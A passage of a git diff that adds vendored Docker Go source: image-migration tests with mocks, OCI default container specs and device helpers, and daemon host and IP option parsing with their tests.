"sha256:55dc925c23d1ed82551fd018c27ac3ee731377b6bad3963a2a4e76e753d70e57") + if err != nil { + t.Fatal(err) + } + + err = migrateImages(tmpdir, ls, is, ms, mappings) + if err != nil { + t.Fatal(err) + } + + expected["d1592a710ac323612bd786fa8ac20727c58d8a67847e5a65177c594f43919498"] = image.ID("sha256:c091bb33854e57e6902b74c08719856d30b5593c7db6143b2b48376b8a588395") + expected["17583c7dd0dae6244203b8029733bdb7d17fccbb2b5d93e2b24cf48b8bfd06e2"] = image.ID("sha256:d963020e755ff2715b936065949472c1f8a6300144b922992a1a421999e71f07") + + if actual, expected := ls.count, 2; actual != expected { + t.Fatalf("invalid register count: expected %q, got %q", expected, actual) + } + + v2MetadataService := metadata.NewV2MetadataService(ms) + receivedMetadata, err := v2MetadataService.GetMetadata(layer.EmptyLayer.DiffID()) + if err != nil { + t.Fatal(err) + } + + expectedMetadata := []metadata.V2Metadata{ + {Digest: digest.Digest("sha256:55dc925c23d1ed82551fd018c27ac3ee731377b6bad3963a2a4e76e753d70e57")}, + {Digest: digest.Digest("sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4")}, + } + + if !reflect.DeepEqual(expectedMetadata, receivedMetadata) { + t.Fatalf("invalid metadata: expected %q, got %q", expectedMetadata, receivedMetadata) + } + +} + +func TestMigrateUnsupported(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "migrate-empty") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + err = os.MkdirAll(filepath.Join(tmpdir, "graph"), 0700) + if err != nil { + t.Fatal(err) + } + + err = Migrate(tmpdir, "generic", nil, nil, nil, nil) + if err != errUnsupported { + t.Fatalf("expected unsupported error, got %q", err) + } +} + +func TestMigrateEmptyDir(t *testing.T) { + tmpdir, err := ioutil.TempDir("", "migrate-empty") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpdir) + + err = Migrate(tmpdir, "generic", nil, nil, nil, nil) + if err != nil { + t.Fatal(err) + } +} + +func addImage(dest, jsonConfig, parent, checksum string) (string, error) { + var config struct{ ID string } + if err := json.Unmarshal([]byte(jsonConfig), &config); err != nil { + return "", err + } + if config.ID == "" { + b := make([]byte, 32) + rand.Read(b) + config.ID = hex.EncodeToString(b) + } + contDir := filepath.Join(dest, "graph", config.ID) + if err := os.MkdirAll(contDir, 0700); err != nil { + return "", err + } + if err := ioutil.WriteFile(filepath.Join(contDir, "json"), []byte(jsonConfig), 0600); err != nil { + return "", err + } + if checksum != "" { + if err := ioutil.WriteFile(filepath.Join(contDir, "checksum"), []byte(checksum), 0600); err != nil { + return "", err + } + } + if err := ioutil.WriteFile(filepath.Join(contDir, ".migration-diffid"), []byte(layer.EmptyLayer.DiffID()), 0600); err != nil { + return "", err + } + if err := ioutil.WriteFile(filepath.Join(contDir, ".migration-size"), []byte("0"), 0600); err != nil { + return "", err + } + if parent != "" { + if err := ioutil.WriteFile(filepath.Join(contDir, "parent"), []byte(parent), 0600); err != nil { + return "", err + } + } + if checksum != "" { + if err := ioutil.WriteFile(filepath.Join(contDir, "checksum"), []byte(checksum), 0600); err != nil { + return "", err + } + } + return config.ID, nil +} + +func addContainer(dest, jsonConfig string) error { + var config struct{ ID string } + if err := json.Unmarshal([]byte(jsonConfig), &config); err != nil { + return err + } + contDir := filepath.Join(dest, "containers", config.ID) + if err := os.MkdirAll(contDir, 0700); err != nil { + return err + } + if err := ioutil.WriteFile(filepath.Join(contDir, "config.json"), []byte(jsonConfig), 0600); err != nil { + return err + } + return nil +} + +type mockTagAdder struct { + refs map[string]string +} + +func (t *mockTagAdder) AddTag(ref reference.Named, id digest.Digest, force bool) error { + if t.refs == nil { + t.refs = make(map[string]string) + } + t.refs[ref.String()] = id.String() + return nil +} +func (t *mockTagAdder) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error { + return t.AddTag(ref, id, force) +} + +type mockRegistrar struct { + layers map[layer.ChainID]*mockLayer + count int +} + +func (r *mockRegistrar) RegisterByGraphID(graphID string, parent layer.ChainID, diffID layer.DiffID, tarDataFile string, size int64) (layer.Layer, error) { + r.count++ + l := &mockLayer{} + if parent != "" { + p, exists := r.layers[parent] + if !exists { + return nil, fmt.Errorf("invalid parent %q", parent) + } + l.parent = p + l.diffIDs = append(l.diffIDs, p.diffIDs...) + } + l.diffIDs = append(l.diffIDs, diffID) + if r.layers == nil { + r.layers = make(map[layer.ChainID]*mockLayer) + } + r.layers[l.ChainID()] = l + return l, nil +} +func (r *mockRegistrar) Release(l layer.Layer) ([]layer.Metadata, error) { + return nil, nil +} +func (r *mockRegistrar) Get(layer.ChainID) (layer.Layer, error) { + return nil, nil +} + +type mountInfo struct { + name, graphID, parent string +} +type mockMounter struct { + mounts []mountInfo + count int +} + +func (r *mockMounter) CreateRWLayerByGraphID(name string, graphID string, parent layer.ChainID) error { + r.mounts = append(r.mounts, mountInfo{name, graphID, string(parent)}) + return nil +} +func (r *mockMounter) Unmount(string) error { + r.count-- + return nil +} +func (r *mockMounter) Get(layer.ChainID) (layer.Layer, error) { + return nil, nil +} + +func (r *mockMounter) Release(layer.Layer) ([]layer.Metadata, error) { + return nil, nil +} + +type mockLayer struct { + diffIDs []layer.DiffID + parent *mockLayer +} + +func (l *mockLayer) TarStream() (io.ReadCloser, error) { + return nil, nil +} +func (l *mockLayer) TarStreamFrom(layer.ChainID) (io.ReadCloser, error) { + return nil, nil +} + +func (l *mockLayer) ChainID() layer.ChainID { + return layer.CreateChainID(l.diffIDs) +} + +func (l *mockLayer) DiffID() layer.DiffID { + return l.diffIDs[len(l.diffIDs)-1] +} + +func (l *mockLayer) Parent() layer.Layer { + if l.parent == nil { + return nil + } + return l.parent +} + +func (l *mockLayer) Size() (int64, error) { + return 0, nil +} + +func (l *mockLayer) DiffSize() (int64, error) { + return 0, nil +} + +func (l *mockLayer) Metadata() (map[string]string, error) { + return nil, nil +} diff --git a/vendor/github.com/docker/docker/oci/defaults_linux.go b/vendor/github.com/docker/docker/oci/defaults_linux.go new file mode 100644 index 0000000000..8b3ce7281b --- /dev/null +++ b/vendor/github.com/docker/docker/oci/defaults_linux.go @@ -0,0 +1,168 @@ +package oci + +import ( + "os" + "runtime" + + "github.com/opencontainers/runtime-spec/specs-go" +) + +func sPtr(s string) *string { return &s } +func iPtr(i int64) *int64 { return &i } +func u32Ptr(i int64) *uint32 { u := uint32(i); return &u } +func fmPtr(i int64) *os.FileMode { fm := os.FileMode(i); return &fm } + +// DefaultSpec returns default oci spec used by docker. +func DefaultSpec() specs.Spec { + s := specs.Spec{ + Version: specs.Version, + Platform: specs.Platform{ + OS: runtime.GOOS, + Arch: runtime.GOARCH, + }, + } + s.Mounts = []specs.Mount{ + { + Destination: "/proc", + Type: "proc", + Source: "proc", + Options: []string{"nosuid", "noexec", "nodev"}, + }, + { + Destination: "/dev", + Type: "tmpfs", + Source: "tmpfs", + Options: []string{"nosuid", "strictatime", "mode=755"}, + }, + { + Destination: "/dev/pts", + Type: "devpts", + Source: "devpts", + Options: []string{"nosuid", "noexec", "newinstance", "ptmxmode=0666", "mode=0620", "gid=5"}, + }, + { + Destination: "/sys", + Type: "sysfs", + Source: "sysfs", + Options: []string{"nosuid", "noexec", "nodev", "ro"}, + }, + { + Destination: "/sys/fs/cgroup", + Type: "cgroup", + Source: "cgroup", + Options: []string{"ro", "nosuid", "noexec", "nodev"}, + }, + { + Destination: "/dev/mqueue", + Type: "mqueue", + Source: "mqueue", + Options: []string{"nosuid", "noexec", "nodev"}, + }, + } + s.Process.Capabilities = []string{ + "CAP_CHOWN", + "CAP_DAC_OVERRIDE", + "CAP_FSETID", + "CAP_FOWNER", + "CAP_MKNOD", + "CAP_NET_RAW", + "CAP_SETGID", + "CAP_SETUID", + "CAP_SETFCAP", + "CAP_SETPCAP", + "CAP_NET_BIND_SERVICE", + "CAP_SYS_CHROOT", + "CAP_KILL", + "CAP_AUDIT_WRITE", + } + + s.Linux = &specs.Linux{ + MaskedPaths: []string{ + "/proc/kcore", + "/proc/latency_stats", + "/proc/timer_list", + "/proc/timer_stats", + "/proc/sched_debug", + "/sys/firmware", + }, + ReadonlyPaths: []string{ + "/proc/asound", + "/proc/bus", + "/proc/fs", + "/proc/irq", + "/proc/sys", + "/proc/sysrq-trigger", + }, + Namespaces: []specs.Namespace{ + {Type: "mount"}, + {Type: "network"}, + {Type: "uts"}, + {Type: "pid"}, + {Type: "ipc"}, + }, + // Devices implicitly contains the following devices: + // null, zero, full, random, urandom, tty, console, and ptmx. + // ptmx is a bind-mount or symlink of the container's ptmx. + // See also: https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#default-devices + Devices: []specs.Device{}, + Resources: &specs.Resources{ + Devices: []specs.DeviceCgroup{ + { + Allow: false, + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(1), + Minor: iPtr(5), + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(1), + Minor: iPtr(3), + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(1), + Minor: iPtr(9), + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(1), + Minor: iPtr(8), + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(5), + Minor: iPtr(0), + Access: sPtr("rwm"), + }, + { + Allow: true, + Type: sPtr("c"), + Major: iPtr(5), + Minor: iPtr(1), + Access: sPtr("rwm"), + }, + { + Allow: false, + Type: sPtr("c"), + Major: iPtr(10), + Minor: iPtr(229), + Access: sPtr("rwm"), + }, + }, + }, + } + + return s +} diff --git a/vendor/github.com/docker/docker/oci/defaults_solaris.go b/vendor/github.com/docker/docker/oci/defaults_solaris.go new file mode 100644 index 0000000000..85c8b68e16 --- /dev/null +++ b/vendor/github.com/docker/docker/oci/defaults_solaris.go @@ -0,0 +1,20 @@ +package oci + +import ( + "runtime" + + "github.com/opencontainers/runtime-spec/specs-go" +) + +// DefaultSpec returns default oci spec used by docker. +func DefaultSpec() specs.Spec { + s := specs.Spec{ + Version: "0.6.0", + Platform: specs.Platform{ + OS: "SunOS", + Arch: runtime.GOARCH, + }, + } + s.Solaris = &specs.Solaris{} + return s +} diff --git a/vendor/github.com/docker/docker/oci/defaults_windows.go b/vendor/github.com/docker/docker/oci/defaults_windows.go new file mode 100644 index 0000000000..ab51904ec4 --- /dev/null +++ b/vendor/github.com/docker/docker/oci/defaults_windows.go @@ -0,0 +1,19 @@ +package oci + +import ( + "runtime" + + "github.com/opencontainers/runtime-spec/specs-go" +) + +// DefaultSpec returns default spec used by docker. +func DefaultSpec() specs.Spec { + return specs.Spec{ + Version: specs.Version, + Platform: specs.Platform{ + OS: runtime.GOOS, + Arch: runtime.GOARCH, + }, + Windows: &specs.Windows{}, + } +} diff --git a/vendor/github.com/docker/docker/oci/devices_linux.go b/vendor/github.com/docker/docker/oci/devices_linux.go new file mode 100644 index 0000000000..2840d2586a --- /dev/null +++ b/vendor/github.com/docker/docker/oci/devices_linux.go @@ -0,0 +1,86 @@ +package oci + +import ( + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/opencontainers/runc/libcontainer/configs" + "github.com/opencontainers/runc/libcontainer/devices" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +// Device transforms a libcontainer configs.Device to a specs.Device object. +func Device(d *configs.Device) specs.Device { + return specs.Device{ + Type: string(d.Type), + Path: d.Path, + Major: d.Major, + Minor: d.Minor, + FileMode: fmPtr(int64(d.FileMode)), + UID: u32Ptr(int64(d.Uid)), + GID: u32Ptr(int64(d.Gid)), + } +} + +func deviceCgroup(d *configs.Device) specs.DeviceCgroup { + t := string(d.Type) + return specs.DeviceCgroup{ + Allow: true, + Type: &t, + Major: &d.Major, + Minor: &d.Minor, + Access: &d.Permissions, + } +} + +// DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions. +func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) { + resolvedPathOnHost := pathOnHost + + // check if it is a symbolic link + if src, e := os.Lstat(pathOnHost); e == nil && src.Mode()&os.ModeSymlink == os.ModeSymlink { + if linkedPathOnHost, e := filepath.EvalSymlinks(pathOnHost); e == nil { + resolvedPathOnHost = linkedPathOnHost + } + } + + device, err := devices.DeviceFromPath(resolvedPathOnHost, cgroupPermissions) + // if there was no error, return the device + if err == nil { + device.Path = pathInContainer + return append(devs, Device(device)), append(devPermissions, deviceCgroup(device)), nil + } + + // if the device is not a device node + // try to see if it's a directory holding many devices + if err == devices.ErrNotADevice { + + // check if it is a directory + if src, e := os.Stat(resolvedPathOnHost); e == nil && src.IsDir() { + + // mount the internal devices recursively + filepath.Walk(resolvedPathOnHost, func(dpath string, f os.FileInfo, e error) error { + childDevice, e := devices.DeviceFromPath(dpath, cgroupPermissions) + if e != nil { + // ignore the device + return nil + } + + // add the device to userSpecified devices + childDevice.Path = strings.Replace(dpath, resolvedPathOnHost, pathInContainer, 1) + devs = append(devs, Device(childDevice)) + devPermissions = append(devPermissions, deviceCgroup(childDevice)) + + return nil + }) + } + } + + if len(devs) > 0 { + return devs, devPermissions, nil + } + + return devs, devPermissions, fmt.Errorf("error gathering device information while adding custom device %q: %s", pathOnHost, err) +} diff --git a/vendor/github.com/docker/docker/oci/devices_unsupported.go b/vendor/github.com/docker/docker/oci/devices_unsupported.go new file mode 100644 index 0000000000..6252cab536 --- /dev/null +++ b/vendor/github.com/docker/docker/oci/devices_unsupported.go @@ -0,0 +1,20 @@ +// +build !linux + +package oci + +import ( + "errors" + + "github.com/opencontainers/runc/libcontainer/configs" + specs "github.com/opencontainers/runtime-spec/specs-go" +) + +// Device transforms a libcontainer configs.Device to a specs.Device object. +// Not implemented +func Device(d *configs.Device) specs.Device { return specs.Device{} } + +// DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions. +// Not implemented +func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) { + return nil, nil, errors.New("oci/devices: unsupported platform") +} diff --git a/vendor/github.com/docker/docker/oci/namespaces.go b/vendor/github.com/docker/docker/oci/namespaces.go new file mode 100644 index 0000000000..4902482498 --- /dev/null +++ b/vendor/github.com/docker/docker/oci/namespaces.go @@ -0,0 +1,16 @@ +package oci + +import specs "github.com/opencontainers/runtime-spec/specs-go" + +// RemoveNamespace removes the `nsType` namespace from OCI spec `s` +func RemoveNamespace(s *specs.Spec, nsType specs.NamespaceType) { + idx := -1 + for i, n := range s.Linux.Namespaces { + if n.Type == nsType { + idx = i + } + } + if idx >= 0 { + s.Linux.Namespaces = append(s.Linux.Namespaces[:idx], s.Linux.Namespaces[idx+1:]...) + } +} diff --git a/vendor/github.com/docker/docker/opts/hosts.go b/vendor/github.com/docker/docker/opts/hosts.go new file mode 100644 index 0000000000..266df1e537 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/hosts.go @@ -0,0 +1,151 @@ +package opts + +import ( + "fmt" + "net" + "net/url" + "strconv" + "strings" +) + +var ( + // DefaultHTTPPort Default HTTP Port used if only the protocol is provided to -H flag e.g. docker daemon -H tcp:// + // These are the IANA registered port numbers for use with Docker + // see http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=docker + DefaultHTTPPort = 2375 // Default HTTP Port + // DefaultTLSHTTPPort Default HTTP Port used when TLS enabled + DefaultTLSHTTPPort = 2376 // Default TLS encrypted HTTP Port + // DefaultUnixSocket Path for the unix socket. + // Docker daemon by default always listens on the default unix socket + DefaultUnixSocket = "/var/run/docker.sock" + // DefaultTCPHost constant defines the default host string used by docker on Windows + DefaultTCPHost = fmt.Sprintf("tcp://%s:%d", DefaultHTTPHost, DefaultHTTPPort) + // DefaultTLSHost constant defines the default host string used by docker for TLS sockets + DefaultTLSHost = fmt.Sprintf("tcp://%s:%d", DefaultHTTPHost, DefaultTLSHTTPPort) + // DefaultNamedPipe defines the default named pipe used by docker on Windows + DefaultNamedPipe = `//./pipe/docker_engine` +) + +// ValidateHost validates that the specified string is a valid host and returns it. +func ValidateHost(val string) (string, error) { + host := strings.TrimSpace(val) + // The empty string means default and is not handled by parseDockerDaemonHost + if host != "" { + _, err := parseDockerDaemonHost(host) + if err != nil { + return val, err + } + } + // Note: unlike most flag validators, we don't return the mutated value here + // we need to know what the user entered later (using ParseHost) to adjust for tls + return val, nil +} + +// ParseHost and set defaults for a Daemon host string +func ParseHost(defaultToTLS bool, val string) (string, error) { + host := strings.TrimSpace(val) + if host == "" { + if defaultToTLS { + host = DefaultTLSHost + } else { + host = DefaultHost + } + } else { + var err error + host, err = parseDockerDaemonHost(host) + if err != nil { + return val, err + } + } + return host, nil +} + +// parseDockerDaemonHost parses the specified address and returns an address that will be used as the host. +// Depending of the address specified, this may return one of the global Default* strings defined in hosts.go. +func parseDockerDaemonHost(addr string) (string, error) { + addrParts := strings.SplitN(addr, "://", 2) + if len(addrParts) == 1 && addrParts[0] != "" { + addrParts = []string{"tcp", addrParts[0]} + } + + switch addrParts[0] { + case "tcp": + return ParseTCPAddr(addrParts[1], DefaultTCPHost) + case "unix": + return parseSimpleProtoAddr("unix", addrParts[1], DefaultUnixSocket) + case "npipe": + return parseSimpleProtoAddr("npipe", addrParts[1], DefaultNamedPipe) + case "fd": + return addr, nil + default: + return "", fmt.Errorf("Invalid bind address format: %s", addr) + } +} + +// parseSimpleProtoAddr parses and validates that the specified address is a valid +// socket address for simple protocols like unix and npipe. It returns a formatted +// socket address, either using the address parsed from addr, or the contents of +// defaultAddr if addr is a blank string. +func parseSimpleProtoAddr(proto, addr, defaultAddr string) (string, error) { + addr = strings.TrimPrefix(addr, proto+"://") + if strings.Contains(addr, "://") { + return "", fmt.Errorf("Invalid proto, expected %s: %s", proto, addr) + } + if addr == "" { + addr = defaultAddr + } + return fmt.Sprintf("%s://%s", proto, addr), nil +} + +// ParseTCPAddr parses and validates that the specified address is a valid TCP +// address. It returns a formatted TCP address, either using the address parsed +// from tryAddr, or the contents of defaultAddr if tryAddr is a blank string. +// tryAddr is expected to have already been Trim()'d +// defaultAddr must be in the full `tcp://host:port` form +func ParseTCPAddr(tryAddr string, defaultAddr string) (string, error) { + if tryAddr == "" || tryAddr == "tcp://" { + return defaultAddr, nil + } + addr := strings.TrimPrefix(tryAddr, "tcp://") + if strings.Contains(addr, "://") || addr == "" { + return "", fmt.Errorf("Invalid proto, expected tcp: %s", tryAddr) + } + + defaultAddr = strings.TrimPrefix(defaultAddr, "tcp://") + defaultHost, defaultPort, err := net.SplitHostPort(defaultAddr) + if err != nil { + return "", err + } + // url.Parse fails for trailing colon on IPv6 brackets on Go 1.5, but + // not 1.4. See https://github.com/golang/go/issues/12200 and + // https://github.com/golang/go/issues/6530. + if strings.HasSuffix(addr, "]:") { + addr += defaultPort + } + + u, err := url.Parse("tcp://" + addr) + if err != nil { + return "", err + } + host, port, err := net.SplitHostPort(u.Host) + if err != nil { + // try port addition once + host, port, err = net.SplitHostPort(net.JoinHostPort(u.Host, defaultPort)) + } + if err != nil { + return "", fmt.Errorf("Invalid bind address format: %s", tryAddr) + } + + if host == "" { + host = defaultHost + } + if port == "" { + port = defaultPort + } + p, err := strconv.Atoi(port) + if err != nil && p == 0 { + return "", fmt.Errorf("Invalid bind address format: %s", tryAddr) + } + + return fmt.Sprintf("tcp://%s%s", net.JoinHostPort(host, port), u.Path), nil +} diff --git a/vendor/github.com/docker/docker/opts/hosts_test.go b/vendor/github.com/docker/docker/opts/hosts_test.go new file mode 100644 index 0000000000..a5bec30d4c --- /dev/null +++ b/vendor/github.com/docker/docker/opts/hosts_test.go @@ -0,0 +1,148 @@ +package opts + +import ( + "fmt" + "testing" +) + +func TestParseHost(t *testing.T) { + invalid := []string{ + "something with spaces", + "://", + "unknown://", + "tcp://:port", + "tcp://invalid:port", + } + + valid := map[string]string{ + "": DefaultHost, + " ": DefaultHost, + " ": DefaultHost, + "fd://": "fd://", + "fd://something": "fd://something", + "tcp://host:": fmt.Sprintf("tcp://host:%d", DefaultHTTPPort), + "tcp://": DefaultTCPHost, + "tcp://:2375": fmt.Sprintf("tcp://%s:2375", DefaultHTTPHost), + "tcp://:2376": fmt.Sprintf("tcp://%s:2376", DefaultHTTPHost), + "tcp://0.0.0.0:8080": "tcp://0.0.0.0:8080", + "tcp://192.168.0.0:12000": "tcp://192.168.0.0:12000", + "tcp://192.168:8080": "tcp://192.168:8080", + "tcp://0.0.0.0:1234567890": "tcp://0.0.0.0:1234567890", // yeah it's valid :P + " tcp://:7777/path ": fmt.Sprintf("tcp://%s:7777/path", DefaultHTTPHost), + "tcp://docker.com:2375": "tcp://docker.com:2375", + "unix://": "unix://" + DefaultUnixSocket, + "unix://path/to/socket": "unix://path/to/socket", + "npipe://": "npipe://" + DefaultNamedPipe, + "npipe:////./pipe/foo": "npipe:////./pipe/foo", + } + + for _, value := range invalid { + if _, err := ParseHost(false, value); err == nil { + t.Errorf("Expected an error for %v, got [nil]", value) + } + } + + for value, expected := range valid { + if actual, err := ParseHost(false, value); err != nil || actual != expected { + t.Errorf("Expected for %v [%v], got [%v, %v]", value, expected, actual, err) + } + } +} + +func TestParseDockerDaemonHost(t *testing.T) { + invalids := map[string]string{ + + "tcp:a.b.c.d": "Invalid bind address format: tcp:a.b.c.d", + "tcp:a.b.c.d/path": "Invalid bind address format: tcp:a.b.c.d/path", + "udp://127.0.0.1": "Invalid bind address format: udp://127.0.0.1", + "udp://127.0.0.1:2375": "Invalid bind address format: udp://127.0.0.1:2375", + "tcp://unix:///run/docker.sock": "Invalid proto, expected tcp: unix:///run/docker.sock", + " tcp://:7777/path ": "Invalid bind address format: tcp://:7777/path ", + "": "Invalid bind address format: ", + } + valids := map[string]string{ + "0.0.0.1:": "tcp://0.0.0.1:2375", + "0.0.0.1:5555": "tcp://0.0.0.1:5555", + "0.0.0.1:5555/path": "tcp://0.0.0.1:5555/path", + "[::1]:": "tcp://[::1]:2375", + "[::1]:5555/path": "tcp://[::1]:5555/path", + "[0:0:0:0:0:0:0:1]:": "tcp://[0:0:0:0:0:0:0:1]:2375", + "[0:0:0:0:0:0:0:1]:5555/path": "tcp://[0:0:0:0:0:0:0:1]:5555/path", + ":6666": fmt.Sprintf("tcp://%s:6666", DefaultHTTPHost), + ":6666/path": fmt.Sprintf("tcp://%s:6666/path", DefaultHTTPHost), + "tcp://": DefaultTCPHost, + "tcp://:7777": fmt.Sprintf("tcp://%s:7777", DefaultHTTPHost), + "tcp://:7777/path": fmt.Sprintf("tcp://%s:7777/path", DefaultHTTPHost), + "unix:///run/docker.sock": "unix:///run/docker.sock", + "unix://": "unix://" + DefaultUnixSocket, + "fd://": "fd://", + "fd://something": "fd://something", + "localhost:": "tcp://localhost:2375", + "localhost:5555": "tcp://localhost:5555", + "localhost:5555/path": "tcp://localhost:5555/path", + } + for invalidAddr, expectedError := range invalids { + if addr, err := parseDockerDaemonHost(invalidAddr); err == nil || err.Error() != expectedError { + t.Errorf("tcp %v address expected error %q return, got %q and addr %v", invalidAddr, expectedError, err, addr) + } + } + for validAddr, expectedAddr := range valids { + if addr, err := parseDockerDaemonHost(validAddr); err != nil || addr != expectedAddr { + t.Errorf("%v -> expected %v, got (%v) addr (%v)", validAddr, expectedAddr, err, addr) + } + } +} + +func TestParseTCP(t *testing.T) { + var ( + defaultHTTPHost = "tcp://127.0.0.1:2376" + ) + invalids := map[string]string{ + "tcp:a.b.c.d": "Invalid bind address format: tcp:a.b.c.d", + "tcp:a.b.c.d/path": "Invalid bind address format: tcp:a.b.c.d/path", + "udp://127.0.0.1": "Invalid proto, expected tcp: udp://127.0.0.1", + "udp://127.0.0.1:2375": "Invalid proto, expected tcp: udp://127.0.0.1:2375", + } + valids := map[string]string{ + "": defaultHTTPHost, + "tcp://": defaultHTTPHost, + "0.0.0.1:": "tcp://0.0.0.1:2376", + "0.0.0.1:5555": "tcp://0.0.0.1:5555", + "0.0.0.1:5555/path": "tcp://0.0.0.1:5555/path", + ":6666": "tcp://127.0.0.1:6666", + ":6666/path": "tcp://127.0.0.1:6666/path", + "tcp://:7777": "tcp://127.0.0.1:7777", + "tcp://:7777/path": "tcp://127.0.0.1:7777/path", + "[::1]:": "tcp://[::1]:2376", + "[::1]:5555": "tcp://[::1]:5555", + "[::1]:5555/path": "tcp://[::1]:5555/path", + "[0:0:0:0:0:0:0:1]:": "tcp://[0:0:0:0:0:0:0:1]:2376", + "[0:0:0:0:0:0:0:1]:5555": "tcp://[0:0:0:0:0:0:0:1]:5555", + "[0:0:0:0:0:0:0:1]:5555/path": "tcp://[0:0:0:0:0:0:0:1]:5555/path", + "localhost:": "tcp://localhost:2376", + "localhost:5555": "tcp://localhost:5555", + "localhost:5555/path": "tcp://localhost:5555/path", + } + for invalidAddr, expectedError := range invalids { + if addr, err := ParseTCPAddr(invalidAddr, defaultHTTPHost); err == nil || err.Error() != expectedError { + t.Errorf("tcp %v address expected error %v return, got %s and addr %v", invalidAddr, expectedError, err, addr) + } + } + for validAddr, expectedAddr := range valids { + if addr, err := ParseTCPAddr(validAddr, defaultHTTPHost); err != nil || addr != expectedAddr { + t.Errorf("%v -> expected %v, got %v and addr %v", validAddr, expectedAddr, err, addr) + } + } +} + +func TestParseInvalidUnixAddrInvalid(t *testing.T) { + if _, err := parseSimpleProtoAddr("unix", "tcp://127.0.0.1", "unix:///var/run/docker.sock"); err == nil || err.Error() != "Invalid proto, expected unix: tcp://127.0.0.1" { + t.Fatalf("Expected an error, got %v", err) + } + if _, err := parseSimpleProtoAddr("unix", "unix://tcp://127.0.0.1", "/var/run/docker.sock"); err == nil || err.Error() != "Invalid proto, expected unix: tcp://127.0.0.1" { + t.Fatalf("Expected an error, got %v", err) + } + if v, err := parseSimpleProtoAddr("unix", "", "/var/run/docker.sock"); err != nil || v != "unix:///var/run/docker.sock" { + t.Fatalf("Expected an %v, got %v", v, "unix:///var/run/docker.sock") + } +} diff --git a/vendor/github.com/docker/docker/opts/hosts_unix.go b/vendor/github.com/docker/docker/opts/hosts_unix.go new file mode 100644 index 0000000000..611407a9d9 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/hosts_unix.go @@ -0,0 +1,8 @@ +// +build !windows + +package opts + +import "fmt" + +// DefaultHost constant defines the default host string used by docker on other hosts than Windows +var DefaultHost = fmt.Sprintf("unix://%s", DefaultUnixSocket) diff --git a/vendor/github.com/docker/docker/opts/hosts_windows.go b/vendor/github.com/docker/docker/opts/hosts_windows.go new file mode 100644 index 0000000000..7c239e00f1 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/hosts_windows.go @@ -0,0 +1,6 @@ +// +build windows + +package opts + +// DefaultHost constant defines the default host string used by docker on Windows +var DefaultHost = "npipe://" + DefaultNamedPipe diff --git a/vendor/github.com/docker/docker/opts/ip.go b/vendor/github.com/docker/docker/opts/ip.go new file mode 100644 index 0000000000..fb03b50111 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/ip.go @@ -0,0 +1,47 @@ +package opts + +import ( + "fmt" + "net" +) + +// IPOpt holds an IP. It is used to store values from CLI flags. +type IPOpt struct { + *net.IP +} + +// NewIPOpt creates a new IPOpt from a reference net.IP and a +// string representation of an IP. If the string is not a valid +// IP it will fallback to the specified reference. +func NewIPOpt(ref *net.IP, defaultVal string) *IPOpt { + o := &IPOpt{ + IP: ref, + } + o.Set(defaultVal) + return o +} + +// Set sets an IPv4 or IPv6 address from a given string. If the given +// string is not parseable as an IP address it returns an error. +func (o *IPOpt) Set(val string) error { + ip := net.ParseIP(val) + if ip == nil { + return fmt.Errorf("%s is not an ip address", val) + } + *o.IP = ip + return nil +} + +// String returns the IP address stored in the IPOpt. If stored IP is a +// nil pointer, it returns an empty string. +func (o *IPOpt) String() string { + if *o.IP == nil { + return "" + } + return o.IP.String() +} + +// Type returns the type of the option +func (o *IPOpt) Type() string { + return "ip" +} diff --git a/vendor/github.com/docker/docker/opts/ip_test.go b/vendor/github.com/docker/docker/opts/ip_test.go new file mode 100644 index 0000000000..1027d84a05 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/ip_test.go @@ -0,0 +1,54 @@ +package opts + +import ( + "net" + "testing" +) + +func TestIpOptString(t *testing.T) { + addresses := []string{"", "0.0.0.0"} + var ip net.IP + + for _, address := range addresses { + stringAddress := NewIPOpt(&ip, address).String() + if stringAddress != address { + t.Fatalf("IpOpt string should be `%s`, not `%s`", address, stringAddress) + } + } +} + +func TestNewIpOptInvalidDefaultVal(t *testing.T) { + ip := net.IPv4(127, 0, 0, 1) + defaultVal := "Not an ip" + + ipOpt := NewIPOpt(&ip, defaultVal) + + expected := "127.0.0.1" + if ipOpt.String() != expected { + t.Fatalf("Expected [%v], got [%v]", expected, ipOpt.String()) + } +} + +func TestNewIpOptValidDefaultVal(t *testing.T) { + ip := net.IPv4(127, 0, 0, 1) + defaultVal := "192.168.1.1" + + ipOpt := NewIPOpt(&ip, defaultVal) + + expected := "192.168.1.1" + if ipOpt.String() != expected { + t.Fatalf("Expected [%v], got [%v]", expected, ipOpt.String()) + } +} + +func TestIpOptSetInvalidVal(t *testing.T) { + ip := net.IPv4(127, 0, 0, 1) + ipOpt := &IPOpt{IP: &ip} + + invalidIP := "invalid ip" + expectedError := "invalid ip is not an ip address" + err := ipOpt.Set(invalidIP) + if err == nil || err.Error() != expectedError { + t.Fatalf("Expected an Error with [%v], got [%v]", expectedError, err.Error()) + } +} diff --git a/vendor/github.com/docker/docker/opts/mount.go b/vendor/github.com/docker/docker/opts/mount.go new file mode 100644 index 